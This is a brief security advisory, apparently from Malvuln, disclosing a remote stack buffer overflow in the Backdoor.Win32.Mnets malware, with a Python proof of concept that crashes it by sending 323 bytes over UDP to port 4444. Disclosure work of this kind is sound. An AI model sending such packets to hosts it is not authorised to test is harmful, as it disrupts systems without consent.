Backdoor.Win32.Mnets Remote Stack Buffer Overflow

Backdoor.Win32.Mnets malware suffers from a remote stack buffer overflow vulnerability.

Exploit/PoC:

from socket import socket, AF_INET, SOCK_DGRAM

MALWARE_HOST = "x.x.x.x"
PORT = 4444

def doit():
    # UDP protocol
    s = socket(AF_INET, SOCK_DGRAM)
    s.connect((MALWARE_HOST, PORT))

    # Bytes literal so that send() accepts the payload on Python 3
    PACKEE = b"A" * 323

    s.send(PACKEE)
    s.close()

    print("Backdoor.Win32.Mnets / Remote Stack Buffer Overflow")
    print("MD5: 1e42493dcef54a62bc28e0a1338c1142")
    print("By Malvuln")

if __name__ == "__main__":
    doit()